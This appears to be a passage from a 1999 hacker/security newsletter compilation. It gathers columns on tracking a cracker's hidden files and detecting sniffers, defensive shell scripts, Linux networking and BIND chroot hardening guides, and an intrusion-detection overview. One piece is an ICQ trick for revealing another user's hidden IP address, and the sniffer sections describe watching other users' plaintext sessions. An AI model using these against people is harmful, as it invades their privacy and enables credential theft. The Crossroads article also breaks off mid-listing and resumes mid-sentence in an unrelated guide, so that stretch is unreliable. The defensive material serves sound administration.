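        [ -f "$f" ] && printf '%s %s\n' "$(hash_file "$f")" "$f"
    done
}

# check_baseline BASELINE: re-hash every path in BASELINE and print
# OK, CHANGED or MISSING per file. Returns 1 if anything is not OK.
check_baseline() {
    status=0
    while read -r want path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"; status=1
        elif [ "$(hash_file "$path")" != "$want" ]; then
            echo "CHANGED $path"; status=1
        else
            echo "OK      $path"
        fi
    done < "$1"
    return $status
}

# Constructed scratch tree standing in for /bin/netstat, /bin/ps and
# /etc/passwd, so the demonstration touches nothing on the real system.
DEMO=$(mktemp -d)
mkdir "$DEMO/bin"
printf 'original netstat\n' > "$DEMO/bin/netstat"
printf 'original ps\n' > "$DEMO/bin/ps"
printf 'root:x:0:0::/root:/bin/sh\n' > "$DEMO/passwd"
BASELINE="$DEMO/baseline.md5"
make_baseline "$DEMO/bin/netstat" "$DEMO/bin/ps" "$DEMO/passwd" > "$BASELINE"

# Simulate what the article describes: a replaced netstat binary, plus a
# configuration file the administrator legitimately edited (a new user).
printf 'trojaned netstat\n' > "$DEMO/bin/netstat"
printf 'jon:x:1001:1001::/home/jon:/bin/sh\n' >> "$DEMO/passwd"

check_baseline "$BASELINE" || echo "baseline mismatch: investigate"
```

A CHANGED binary is the alarm; a CHANGED /etc/passwd still has to be read, since it may only reflect the user you added yourself.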
Well, it's that time again; the end of another column. Next week, we'll look at the things you can't see after a system has been cracked. Just in case you are starting to wonder if we are going to cover anything other than security, rest assured that security is only one of many concerns for the system and network administrator. Until next week, take care, and happy hunting!

Thwarting the System Cracker, Part 5
by Marcel Gagné
22-Oct-1999

Adventures in system administration continue with "Looking for the Invisible."

Hello everyone, and welcome back. After last week's article, I received a few panicked e-mails telling me that after using the RPM trick, files like "netstat" and "ls" had actually been modified. The question that followed was fairly obvious: "What now?"

You have a fair number of options. Depending on the importance of the system, I will usually recommend taking a backup of the user directories, password and other critical system files, and rebuilding the system without these files, using the backup as a reference for the new system. I won't just copy those files back. Our cracker may have hidden things in legitimate places and we don't want to let him back in quite that easily. You can also leave the system alone, tie down the host access with TCP wrappers, shut down non-essential services, and replace affected packages. Starting clean is important, but we don't always have that luxury -- not immediately anyway. If you discover that your "procps" or "net-tools" package has been modified by a cracker, the first thing to do is to reinstall the package. Since that package may have been the hole through which your cracker entered, it is usually a good idea to get the latest build from your vendor (RedHat, Caldera, Debian, etc). For the truly paranoid, the fact is that once a cracker has access to your system, they can replace anything, including the very files we use to track down the damage.
Like the Shaolin priests in the old TV series "Kung-Fu", the cracker succeeds by being invisible. Now, let's have a look at those invisible things.

Here is a real-life example. After a cracker attack, the machine was tied down, TCP wrappers were installed and all affected packages replaced. It was time to scope out the damage while keeping a close eye on the logs for repeated attempts at break-in. Looking at the /etc/passwd file, I noticed a user that did not belong on the system, "jon." It looked like a normal passwd entry and did not have root privs. With several users on this machine, our cracker hid nicely in the passwd list. When I went to his home directory (/home/jon) and did an "ls -l", all I got was this.

    .  ..  ..  .bashrc  .bash_history  .screenrc  emech.tar.gz

Other than a file called emech.tar.gz, things did not look that strange. Could that be all that was wrong? With a closer look though, you'll notice that there are two ".." directories (pointers to the previous directory in your filesystem hierarchy). That's strange. However, if I change directory to ".." with "cd ..", I just wind up in the /home directory. What's up? What's up is that there is an extra space after the second dot-dot. I can find this out like this.

    # cd /home/jon
    # echo .* | cat -v
    . .. ..  .bashrc .bash_history .screenrc emech.tar.gz

Look very closely. Notice how each item is separated by only one space. Now look between the second "dot-dot" and .bashrc. There are actually two spaces, which means the directory is actually "dot-dot-space." To get into that directory and have a look around, I do this.

    # cd ".. "

Now an "ls" shows me all this fun stuff.

    randfiles   mech.set   mech.pid     checkmech    cpu.memory  mech.help
    mech.usage  mech       mech.levels  emech.users  psdevtab

That's interesting. Let's see if jon has any more files hidden around the disk. Using the find command, I specify a search for files belonging only to this user-id.
   # find / -user jon -print

Aside from what is in the /home/jon directory, I get this partial list.

   /usr/local/bin/.httpd
   /tmp/cl
   /tmp/.l/bcast
   /tmp/.l/.l
   /tmp/.l/imapd
   /tmp/.l/log
   /tmp/.l/pscan
   /tmp/.l/pscan.c
   /tmp/.l/rpc
   /tmp/.l/slice2
   /tmp/.l/sniffer
   /tmp/.l/sxploit
   /tmp/.l/thc
   /tmp/.l/ufs.c

Looking a bit more interesting, isn't it? Sniffers. Port scanners. Our cracker was making quite a home for himself. Furthermore, we discovered two other users coming from different hosts with their own files. Our cracker was either operating from different locations with different IDs or he had friends.

In doing this search, there were even files belonging to this cracker in legitimate user directories, including one very scary file, something called "tcp.log." This file was several hundred lines long and contained every telnet and ftp login that had come to and from the machine. EVERY ONE! Aside from telling the person whose machine had been broken into that they should rebuild the whole thing from scratch, I also told them to change each and every password, not only on this system but on every system they have access to.

Here's the scoop. Part of the information your cracker collects is a list of logins and passwords you use on other systems. Why? So they have an easier time breaking into someone else's system. Every system you have been accessing while your cracker has had access to your system is at risk. You should contact the system administrators of those other systems and inform them of the risk they face. The flip side is that someone logging into your system on a regular basis whose system had been hacked may have given the cracker a valid login and password on your system. Spooky, huh?

Here are a few examples to help you search for the hidden and dangerous. For starters, check the user directories for "suid" or "sgid" (setuid or setgid) files. These are programs that have an "s" instead of an "x" in the owner or group execute position when you do an ls. For instance, an "ls -l" on /usr/bin/passwd returns this information.
   -r-s--x--x   1 root     root        10704 Apr 14  1999 /usr/bin/passwd

The "s" in the fourth position means that the passwd program acts as root when it is being executed. This is necessary in order to allow users to change their passwords. The second "x" is simply an "x," but an "s" in this position (the group execute bit) would mean that the program runs with the privileges of the file's group, whoever runs it. Programs that can act as a specific user or group are not a bad thing -- usually. That said, for the most part, no regular (non-administrative) user needs to have root-suid files in their home directories. Look for them this way. The command assumes that your users are created in the /home directory. Note the parentheses: without them, "-print" applies only to the "-perm -2000" test, and the setuid files are matched but never printed.

   # find /home \( -perm -4000 -o -perm -2000 \) -print

What else can we do? Since we want to speed up the process of finding programs and files left behind by our cracker, a quick way to look for hidden directories would be good. This command will show you those. It will also show you things like ".kde" and so on, but you'll also find things like dot-dot-space and dot-dot-dot, perfect hidey-holes for your cracker.

   # find / -type d -name ".*" -print

The "-type d" option means to list directories only. This can be a big list, but it is certainly a smaller one than you would get if you just walked through every file and directory on the system. What's nice here is that your proper dot and dot-dot directories ("." being the current directory and ".." being the parent directory) do not show up in this list. If you see a dot-dot, it will have some other hidden character following it.

I've run out of space, so let's sum up. Blowing away everything on your cracked system and starting over is a quick and dirty approach that lets you create a properly secure system right from scratch. Eventually, this is what you should probably do anyhow.
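Before the wrap-up, here are the three searches above gathered into one script. This is an added example, not part of the column, and it assumes only POSIX sh, find and sed; the directory and user it scans are whatever you pass on the command line. Hidden directory names are printed through "sed -n l", so a trailing space or tab shows up as ".. $" or "..\t$" instead of something you have to count spaces to notice, and the setuid/setgid search carries the parentheses that make both -perm tests print.

```shell
#!/bin/sh
# Added example (not from the column): reusable versions of the find
# searches for cracker hidey-holes.  Usage: sh hunt.sh <directory> [user]

# find_odd_hidden_dirs <dir>: hidden directories under <dir> whose name is
# dot-dot plus anything (".. ", "...", "..x") or contains whitespace or a
# control character.  Ordinary dotdirs such as .kde are not reported.
# Each hit is printed as parent/ followed by the name as "sed -n l" shows
# it, so a trailing space appears as ".. $" and a tab as "..\t$".
find_odd_hidden_dirs() {
    find "$1" -type d -name '.*' -exec sh -c '
        for path do
            name=${path##*/}
            case $name in
                ..?*|*[[:space:][:cntrl:]]*)
                    printf "%s/" "${path%/*}"
                    printf "%s\n" "$name" | sed -n l ;;
            esac
        done' sh {} + 2>/dev/null || true   # permission errors are not fatal
}

# find_setid_files <dir>: regular files with the setuid (4000) or setgid
# (2000) bit.  The parentheses matter: "-perm -4000 -o -perm -2000 -print"
# attaches -print to the second test only and silently drops setuid hits.
find_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null || true
}

# find_files_owned_by <user> [dir]: everything owned by <user>, default from /.
# On a live system the /proc entries of that user's processes show up too.
find_files_owned_by() {
    find "${2:-/}" -user "$1" -print 2>/dev/null || true
}

if [ $# -gt 0 ]; then
    echo "== hidden directories with odd names under $1 =="
    find_odd_hidden_dirs "$1"
    echo "== setuid/setgid files under $1 =="
    find_setid_files "$1"
    if [ -n "${2:-}" ]; then
        echo "== everything owned by $2 under $1 =="
        find_files_owned_by "$2" "$1"
    fi
fi
```

Run it as "sh hunt.sh /home jon" to reproduce the three searches from the column against the /home tree; pointing the first argument at / gives the whole-disk sweep, at the cost of a long run.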
If your system must be up, using a new box and making that your new production system is probably the next best bet, but providing a brand new system while you investigate the damage to the old one can be costly. PCs are inexpensive, but not everybody is ready to shell out a few thousand to bring another system online. The catch is this -- your cracker has left a wealth of information behind, information you may need. Getting rid of that information is a bit like getting rid of the evidence. It's tough to do an investigation without evidence. Weigh the costs of either decision, then act. But do act.

A quick note of thanks for all the comments I've received on this column, and there have been many. As time goes by, I will try to address those issues that you find important. I'd had some second thoughts about starting the system administration column with something like security, but from the comments, this issue is on the minds of many. Thanks again. Until next week, happy hunting.

Thwarting the System Cracker, Part 6
by Marcel Gagné
29-Oct-1999

Do you smell something? An intro to network sniffers.

Before we get into today's topic, let me cover a small piece of administrivia. A question that keeps coming up in the feedback letters (yes, we do read those things!) is the one regarding past articles. For recent articles, just click down the News and Information column until you see the link for MORE ARTICLES (all topics) ... . Click there, and you'll be taken to an archive of past articles.

One more note: I firmly believe that the best way to beat the cracker is to understand how the cracker works, what his tools are, how they work, and how your system works. It's vital to understand that the tools I present here are for use on your own network. As much as I would like to make every reader of this column an expert, there will always be things I miss. Without sounding too paranoid, though, I'd like everyone to walk away from these discussions just a little bit paranoid.
Last week, I mentioned in my "real life" example that my cracker was using a sniffer to monitor network traffic and collect user names and passwords. Since I did not go into much detail then, I'll try to clarify what I meant by sniffing. Simply put, a sniffer is a tool that lets you monitor packets as they "fly" across your network interface. You could simply monitor your machine's own traffic, but sniffers use promiscuous mode to capture every packet that reaches your network interface, whoever it is addressed to. Allow me to demonstrate. If I run the command ifconfig eth0 on my machine, I get the following output:

   eth0      Link encap:Ethernet  HWaddr 00:C0:4F:E3:C1:8F
             inet addr:192.168.22.2  Bcast:192.168.22.255  Mask:255.255.255.0
             UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
             RX packets:49448 errors:0 dropped:0 overruns:0 frame:0
             TX packets:33859 errors:0 dropped:0 overruns:0 carrier:0
             collisions:6 txqueuelen:100
             Interrupt:10 Base address:0x300

Now let's open up a couple of terminal or xterm windows. In one window, we'll start a sniffer program. The one I'm using is called sniffit and I will start it in interactive mode.

   # sniffit -i

In the second window, re-run the ifconfig command and look for the differences. I'll focus on the important line here.

             UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1

Notice the addition of the word "PROMISC" in this line, short for "promiscuous mode". What that means is that your network interface is indiscriminate as to what network traffic it is listening for. Normally, your interface passes up only frames addressed to its own hardware address (plus broadcasts and multicasts). If you put your network interface in promiscuous mode, it will accept every frame that arrives on the wire, which on a shared hub is everything on the segment.

sniffit is a light, curses-based program that will work in a regular terminal window. I obtained my copy from my Linux vendor's contrib ftp site. You can also visit the web site directly at http://reptile.rug.ac.be/~coder/sniffit/sniffit.html.
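As an added example (not from the column), here are two small parsers that report which interfaces carry the PROMISC flag just shown. They read ifconfig or "ip -o link" output on standard input, so they can be run over saved output as well as live; the sample outputs inside the script are constructed to match the layouts involved, not captured from a real host. The usual caveat applies: the check is only as honest as the ifconfig or ip binary and the kernel it asks, so a cracker who has replaced those can hide the flag just as a modified ps hides a process.

```shell
#!/bin/sh
# Added example (not from the column): list interfaces in promiscuous mode.
# Both parsers read command output on stdin so they also work on saved output.

# promisc_from_ifconfig: handles the classic net-tools layout
#   "eth0      Link encap:..." header, flags on an indented line
# and the newer layout
#   "eth0: flags=4419<UP,BROADCAST,RUNNING,PROMISC,MULTICAST>  mtu 1500".
# A line that starts in column one names the interface; any following line
# (or the header itself) containing PROMISC reports that name.
promisc_from_ifconfig() {
    awk '
        /^[^[:space:]]/          { iface = $1; sub(/:$/, "", iface) }
        /PROMISC/ && iface != "" { print iface }
    '
}

# promisc_from_iplink: handles iproute2 one-line output, e.g.
#   "2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 ..."
# Only a PROMISC inside the <...> flag list counts.
promisc_from_iplink() {
    awk -F'[ :]+' '/<[^>]*PROMISC[^>]*>/ { print $2 }'
}

# live_promisc_check: query the running system with whichever tool exists.
live_promisc_check() {
    if command -v ip >/dev/null 2>&1; then
        ip -o link | promisc_from_iplink
    else
        ifconfig -a | promisc_from_ifconfig
    fi
}

# Constructed sample outputs (not captured from a real host) for offline use.
SAMPLE_IFCONFIG_OLD='eth0      Link encap:Ethernet  HWaddr 00:C0:4F:E3:C1:8F
          inet addr:192.168.22.2  Bcast:192.168.22.255  Mask:255.255.255.0
          UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:3924  Metric:1'

SAMPLE_IFCONFIG_NEW='eth0: flags=4419<UP,BROADCAST,RUNNING,PROMISC,MULTICAST>  mtu 1500
        inet 192.168.22.2  netmask 255.255.255.0  broadcast 192.168.22.255
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0'

SAMPLE_IP_LINK='1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP'

if [ "${1:-}" = "--live" ]; then
    live_promisc_check
else
    echo "Interfaces flagged PROMISC in the constructed samples:"
    printf '%s\n' "$SAMPLE_IFCONFIG_OLD" | promisc_from_ifconfig
    printf '%s\n' "$SAMPLE_IFCONFIG_NEW" | promisc_from_ifconfig
    printf '%s\n' "$SAMPLE_IP_LINK" | promisc_from_iplink
fi
```

Run with --live to check the machine you are sitting on; without arguments it demonstrates the parsers on the embedded samples. An interface in promiscuous mode that you did not put there yourself is a sniffer until proven otherwise.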
One of the cool things about this package is that if you hit return on one of the open sockets in the interactive list, you can watch the plaintext traffic going to and from the user's process. Yes, you can actually see what they are typing. (This almost begs a future column on secure shell, doesn't it?)

Another similar product is netwatch. This is also a network monitoring tool that shows you what connections are alive on your network. You can get netwatch from the application home page at http://www.slctech.org/~mackay/netwatch.html or various other sources.

Now, if you are busy collecting commands to run as part of your system administration toolkit, you could do worse than to check for interfaces running in promiscuous mode. Simply run the ifconfig command and grep for PROMISC, like this:

   ifconfig | grep PROMISC

Keep in mind that this check trusts the ifconfig binary and the kernel it asks; a cracker who has replaced ifconfig can hide the flag just as easily as a modified ps hides a process.

By now I may have made you so scared of loading anything new on your system that you hesitate, but if you would still like to try out a sniffer and see what happens, you're in luck. When you installed your Linux system, you probably also installed a little package called tcpdump. While not as flashy as the other two sniffers I mentioned, this little program will do the same thing. If you've ever wondered what goes on across your network, you'll find this enlightening. Here's how to do it. From the command line, type the following:

   # tcpdump

In a few seconds, you should start seeing packets coming from and going to your system. Here's some output from my system. I told tcpdump to watch for traffic coming to and from www.linuxjournal.com. Notice the -l flag. That tells tcpdump to line-buffer its output, so that I could watch it on the screen while tee saved a copy to a file for later perusal.

   # tcpdump -l host www.linuxjournal.com | tee /tmp/tcpdump.out

This is what the output looked like when I clicked on the web site address:

   16:41:49.101002 www2.linuxjournal.com.www > marcel.somedomain.com.1432: F 2303148464:2303148464(0) ack 1998428290 win 16352
   16:41:49.101206 marcel.somedomain.com.1432 > www2.linuxjournal.com.www: . ack 1 win 32120 (DF)
   16:41:50.001024 www2.linuxjournal.com.www > marcel.somedomain.com.1429: F 1805282316:1805282316(0) ack 1988937134 win 16352
   16:41:50.001215 marcel.somedomain.com.1429 > www2.linuxjournal.com.www: . ack 1 win 32120 (DF)
   16:41:50.840998 www2.linuxjournal.com.www > marcel.somedomain.com.1431: F 1539885010:1539885010(0) ack 1997163524 win 16352
   16:41:50.841198 marcel.somedomain.com.1431 > www2.linuxjournal.com.www: . ack 1 win 32120 (DF)
   16:41:51.494356 marcel.somedomain.com.1429 > www2.linuxjournal.com.www: P 1:335(334) ack 1 win 32120 (DF)
   16:41:51.497003 marcel.somedomain.com.1433 > www2.linuxjournal.com.www: S 2019129753:2019129753(0) win 32120 (DF)
   16:41:51.671023 www2.linuxjournal.com.www > marcel.somedomain.com.1429: R

Each line is one packet: timestamp, source host and port, destination host and port, then the TCP flags (S is SYN, F is FIN, P is PUSH, R is RST, and "." means only ACK was set), followed by sequence numbers, the acknowledgement and the window size.

There are many sniffer programs available. Some are stripped-down packages that simply keep track of logins and passwords from any telnet or ftp session. Your cracker may use a modified ps to hide the presence of the sniffer as it logs away the hours. It may also have a perfectly innocent name in the process table, even if your "ps" is fine.

Enough with the sniffers and on to other things. Way back when I started this column, I made passing reference to CERT. Carnegie Mellon University runs the CERT Coordination Center (http://www.cert.org). If your system has been cracked, you should consider reporting the incident to CERT. Their web site has extensive security information, and "alerts" describing security issues or software weaknesses. One thing you can and should do is subscribe to the CERT advisories:

   http://www.cert.org/contact_cert/certmaillist.html

Before I wrap up for yet another week, this final note. To the handful of people whose feedback comments were "What if the cracker changes rpm or md5sum?", you now have an understanding of how tricky this whole security business is.
My answer to this would be: immediately after installing your system and before you hook up to the Internet, get md5sums of md5sum and rpm, print out the results, and store them for future reference. It's nice to know people are paying attention. Trust nothing but hard copy. Until next week, happy hunting!

@HWA

58.0 Crossroads: Linux networking and security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Introduction to Linux Networking and Security
by Wei-Mei Shyr and Brian Borowski

Congratulations to ACM Crossroads and Wei-Mei Shyr and Brian Borowski! This article was given an Academic Excellence Award by StudyWeb and a link back to this article can be found on the StudyWeb site under the category Computer Science: Operating Systems: Linux.

Linux is a member of the UNIX family but is different from most UNIX implementations because it provides a great UNIX server/workstation environment at a low cost, can be run on a wide variety of platforms, and contains no proprietary code. In this article, we will give a brief introduction to the IP networking services, how to configure them, and how to set up a relatively secure Linux workstation. Please note that the examples given here are from the Slackware distribution. The paths of the files might be different on other distributions of Linux.

Linux TCP/IP Network Services

Linux supports a full and high quality implementation of the TCP/IP networking protocols. With a network interface card or a modem and PPP, one can connect a machine to a local area network or the Internet and have access to many additional services and network utilities.

Linux provides two methods of establishing host-network services. Servers can either run stand-alone or under the control of a program called inetd. Heavily used services will usually run stand-alone. This means the service does all the management and listening on a socket or port itself. The most common stand-alone services are inetd, syslogd, portmapper, named, and routed.
The file /etc/rc.d/rc.inet2 configures the stand-alone services. Here is an example of /etc/rc.d/rc.inet2

   #!/bin/sh
   #
   # rc.inet2    This shell script boots up the entire INET system.

   # Constants.
   NET="/usr/sbin"
   IN_SERV="lpd"
   LPSPOOL="/var/spool/lpd"

   echo -n "Starting daemons:"

   # Start the SYSLOGD/Klogd daemons.  These must come first.
   if [ -f ${NET}/syslogd ]; then
     echo -n " syslogd"
     ${NET}/syslogd &    # Backgrounded to avoid an ugly notice from bash-2.0
     echo -n " klogd"
     ${NET}/klogd
   fi

   ...

   # Start the INET SuperServer
   if [ -f ${NET}/inetd ]; then
     echo -n " inetd"
     ${NET}/inetd
   else
     echo "no INETD found.  INET cancelled!"
     exit 1
   fi

   ....

However, most services run through inetd. inetd is a daemon or background process that starts up near the beginning of the boot sequence in Linux. inetd listens on many ports, and when a connection to a port is requested, it starts up the process associated with that port. Examples of services run from inetd are ftp, telnet, finger, pop, imap, and mail/smtp. inetd is like a switchboard operator who receives calls at the main number of an organization (the IP address of the machine), and then connects the caller to the extension they have requested (the port or socket).

There are two files that configure inetd: /etc/services and /etc/inetd.conf (which may be in /etc/inet/inetd.conf). Below is an example of /etc/inetd.conf

   # See "man 8 inetd" for more information.
   #
   #

, writes that if you have custom logging directories specified that you need to be sure to make these as well (/var/log). Although named won't crash, it will complain.

Step Four: Add named user and group

Add the user named to the /etc/passwd and to the /etc/group files. This will be the UID/GID that the server runs under. You should now go to the /chroot/named/var/run directory and make it writable by named so the named.pid file can be written upon startup. This is used by the ndc command to control named's operation.
At this point you may want to go into your chroot named area and chown -R named.named (named:named with newer chown versions) its etc/namedb directory, i.e. /chroot/named/etc/namedb. This allows named to dump cache and statistical information if you send it the proper signal (kill -INT <pid>). This change should not significantly affect the security of your chroot() setup. Leaving it owned by root won't allow named to write out this information (remember, named now runs under a new UID and no longer as root), but still allows named to function. A second option is to change the permissions to allow writing to this directory while leaving it owned by root. This could also work, but you need to be careful when doing so to ensure normal users can't modify your named records!

IMPORTANT: ** DO NOT USE AN EXISTING UID/GID to run named under (i.e. "nobody"). It is always a bad idea to use an existing UID/GID under a chroot environment as it can impact the protection offered by the service. Make a separate UID/GID for every daemon you run under chroot() as a matter of practice.

Step Five: Edit startup scripts

1) Edit /etc/rc and change the named startup line from:

   echo 'starting named'; named $named_flags

to the location of your statically linked binary under the chroot directory:

   echo 'starting named'; /chroot/named/named $named_flags

You now need to enable a syslog socket in your chroot jail so named can write messages to your logs. To do this, edit /etc/rc.conf and change the syslogd flags:

   syslogd_flags="-a /chroot/named/dev/log"

(FreeBSD uses '-l' instead of '-a')

You will also need to change the startup flags for BIND. Version 8.x has a feature where you can change the user and group ID after binding. This is where you specify the UID/GID you assigned to BIND above.

   named_flags="-u named -g named -t /chroot/named"

2) BIND 8.1.x ships with a script called "ndc" which is used to control named operations. You will need to edit this file and change the location of the variable PIDFILE from /var/run/named.pid to /chroot/named/var/run/named.pid.
BIND 8.2.x and above now makes this a binary and this change won't be necessary any longer.

Step Six: Test it out

Stop syslogd and named if they are running and then from the command line type:

   syslogd -a /chroot/named/dev/log

(FreeBSD uses '-l' instead of '-a')

Go into the /chroot/named/dev directory and ls -al. You should see (the date is insignificant):

   srw-rw-rw-  1 root  wheel  0 Jan 01 12:00 log

The leading "s" in the mode indicates that the file is a socket. This is how named will write to syslog from within the chroot() jail. Now type:

   /chroot/named/named -u named -g named -t /chroot/named

If all goes well, named will start and your logs will indicate that named is "Ready to answer queries." Perform other DNS tests as appropriate to ensure operation, then reboot your system and verify the setup. BIND should have started and reported that it chroot()ed to the directory and changed UID/GID. You can use a program such as lsof to list the owner of all network sockets on the host. The owner should be your named UID/GID.

When everything is working, you should rename /etc/namedb to something like /etc/namedb.orig and chmod 000 /usr/sbin/named to ensure that the old version doesn't get run by mistake. Reboot your system and, assuming everything is correct, your named will now be chroot()ed.

Thanks

Thanks to the following people who made suggestions and submitted corrections:

   Steinar Haug - Comments concerning blocking of TCP to port 53.
   Bernhard Weisshuhn - Comments pertaining to Linux install (typos, adding /etc/group entry).
   Marc Heuse - Comments pertaining to logging and renaming of old binaries and directories.
   Jan Gruber - Comments pertaining to permissions on /chroot/named/var/run and changes to the ndc control script.
   Modred - Corrections for FreeBSD and small typo on making /dev/log.
   Robert J. Brown - Corrections in steps five and six where I typed /chroot/named instead of /chroot/named/named to start the binary. Advised about changes to ndc under BIND 8.2.
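As an added example, not part of Craig Rowland's guide, the following script turns the manual checks in steps four to six into a repeatable test of the jail layout: the syslog socket exists inside the jail, the pid and zone directories are owned by the unprivileged named user, the statically linked binary is in place, and the old /usr/sbin/named can no longer be run. The jail path, the named user and the old binary path are arguments (the defaults in the usage line are the guide's), so it can be pointed at a jail that has not been booted yet; the live process check is kept separate because it needs pgrep and a running named.

```shell
#!/bin/sh
# Added example (not from the guide): sanity-check a chroot()ed named.
# Usage: sh check_jail.sh /chroot/named named /usr/sbin/named

fails=0

# check <description> <command...>: run the command quietly, record PASS/FAIL
check() {
    desc=$1; shift
    if "$@" >/dev/null 2>&1; then
        echo "PASS: $desc"
    else
        echo "FAIL: $desc"
        fails=$((fails + 1))
    fi
}

# owned_by <user> <path>: true when <path> exists and is owned by <user>.
# -prune stops find from descending, so only the path itself is tested.
owned_by() {
    [ -n "$(find "$2" -prune -user "$1" -print 2>/dev/null)" ]
}

# check_named_jail <jail> <user> <oldbin>: static checks on the jail
# layout; returns the number of failed checks.
check_named_jail() {
    jail=$1 user=$2 oldbin=$3
    fails=0
    check "syslog socket present at $jail/dev/log (syslogd -a / -l in effect)" \
          test -S "$jail/dev/log"
    check "statically linked named present at $jail/named" \
          test -x "$jail/named"
    check "pid directory $jail/var/run owned by $user (ndc needs named.pid)" \
          owned_by "$user" "$jail/var/run"
    check "zone directory $jail/etc/namedb owned by $user (cache/stat dumps)" \
          owned_by "$user" "$jail/etc/namedb"
    check "old binary $oldbin not executable (chmod 000 done)" \
          test ! -x "$oldbin"
    return "$fails"
}

# check_named_process <user>: on a live system, confirm the running named
# has dropped to <user>; needs pgrep, so it is not part of the static checks.
check_named_process() {
    check "named process running as $1" pgrep -u "$1" -x named
}

if [ $# -eq 3 ]; then
    check_named_jail "$1" "$2" "$3"
    check_named_process "$2"
    echo "$fails check(s) failed"
fi
```

A FAIL on the socket line before the reboot usually means syslogd was started without the -a (or -l on FreeBSD) flag; a FAIL on the process line after the reboot means named is still root, which defeats the purpose of the jail.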
Other Sources

Adam Shostack's Home Page - Good reading on various items.
   http://www.homeport.org/~adam

Internet Software Consortium - Suppliers of BIND, INN, and other software.
   http://www.isc.org

All Material Copyright ©1996-99 Craig H. Rowland and Psionic Software Systems

@HWA

61.0 Getting someone's IP thru ICQ without a hacking proggie
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.pheces.org presents...

Getting someone's IP through ICQ without a funky program
------------------------------------------
Author: X-Arch

Disclaimer (who gives a fuk but eh): I'm not responsible for anything you use this information for... for educational purposes and all that stuff... so just chill and use it for knowledge. =)
-----------------------------------------

What are we doing:
Ever wanted to get someone's IP when the only way is through ICQ and they have it hidden? ... and you don't have any programs on you to do so? ... well here we go... a very easy trick to get past it and see their IP in their info...

Related txts: none that I know of

How to:

Step #1: Connect to the ICQ network... i.e. just load ICQ and connect.

Step #2: Is the person whose IP you want online? If so, simply check their ICQ info... if it is hidden, then here we go, this is how you get their IP...

Step #3: Make sure they are online and then DISCONNECT YOURSELF from ICQ ONLY, i.e. go to ICQ, then Status, and click Disconnected.

Step #4: Then WHILE you are offline, go to the person whose IP you want, go to their INFO, and their LAST IP will be there.
So if they are still online you will see their IP and there you go... have fun... =)

Method 2 (unstable method):

Step #1: Connect to ICQ... then send a message to the person whose IP you want....

Step #2: When you get a response, go to a DOS prompt and type "netstat"... then look through the IPs listed there for a connection on a port between 1000 and 4000 or something of the sort... that should be them sending a message on that port through ICQ... enjoy... this method is more unstable and not as reliable, and more for advanced users who know how to use netstat properly...

Well, that's it for now... enjoy!

(((((((((((((((((((((((((((((((((((#yep)))))))))))))))))))))))))))))))))))))

@HWA

62.0 Intrusion detection within a secured network
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intrusion Detection within a Secured Network

This information was provided and written by OptikNerve.

This text file describes how to detect an intrusion within a secured network, for the system administrator. The programs that are used in this text file are: RealSecure 3.0, Centrax 2.2, and AXENT NetProwler.

Site Resources:
   www.cybersafe.com - Centrax 2.2
   www.axent.com     - NetProwler 3.0
   www.iss.net       - RealSecure 3.0

Introduction to Intrusion Detection

Intrusion detection methods are pretty much based on the assumption that an intruder's activity is noticeably different from the usual behavior of a regular user. The distinguishing characteristics of an ID system include the set of parameters it examines and the source of its data.

Host-based intrusion detection systems are of two different types: application-specific and operating-system-specific. In both types, an agent generally runs on the server being monitored, and analyzes log files, access records, and application log files. Anomaly detection modules, which are based on statistical comparisons to normal patterns, are typically used in host-based systems.
In the case of operating-system-specific monitors, abnormal sessions, such as unsuccessful logins, are compared to a behavioral model of normal usage using criteria such as time of access and the number and types of files created and accessed. Application-specific intrusion detection tools usually define a set of rules describing suspicious activity based on logged events. Generally, these tools don't operate in real time and don't have access to the protocol or other real packet-level information while searching for the patterns of suspicious activity.

Network-based intrusion detection monitors have the benefit of potentially analyzing all layers of the network communication. These tools can reside on their own servers and can therefore eliminate performance hits on the application server(s). They can also use a rule base to describe common attack techniques. Patterns (known as attack signatures) define the sequence of network events that constitute an attack. Attack signatures can be defined dynamically as user-definable patterns or statically as functions within the application.

Deploying Intrusion Detection

Since network-based intrusion detection operates by analyzing network traffic, the monitors provide protection only for the local segments they can see. There are four common deployment strategies:

In the network's DMZ (demilitarized zone) -- Acts to protect devices in that area, such as firewalls, from attack.

On each critical segment within the intranet -- Detecting intrusions here can help protect against security breaches from within the organization.

Just inside the firewall on the intranet -- Provides a means of monitoring a firewall and ensures that there are no tunnels through that firewall being used to breach the system.

On critical hosts -- Sensitive data gains some protection by having intrusion detection agents monitor unusual administrative activities or configuration changes.
It has long been said that most attacks are carried out from within the organization, but this is beginning to change: in various surveys, that statement would now be considered false, with attacks arriving over the Internet outnumbering those from internal sources. If you're concerned about interdepartmental traffic, the network backbone is another location for an intrusion detection monitor. Network administrators with large modem pools may want to monitor traffic immediately behind the modems.

RealSecure 3.0

RealSecure 3.0 is a member of Internet Security Systems' SAFEsuite package of network security software. Other applications include Internet Scanner, a network vulnerability scanner that checks TCP/IP services, Web servers, and firewalls for specific vulnerabilities or exploits; System Scanner, an operating-system-specific vulnerability checker; and Database Scanner, a risk assessment product for Microsoft SQL Server and Sybase databases.

RealSecure supports two types of detectors: system agents and network engines. Network engines monitor network packets on a segment looking for attack patterns. System agents monitor activity on hosts to determine whether an intruder has gained access to the system. RealSecure is administered from a console application, which communicates with the other components using strong authentication.

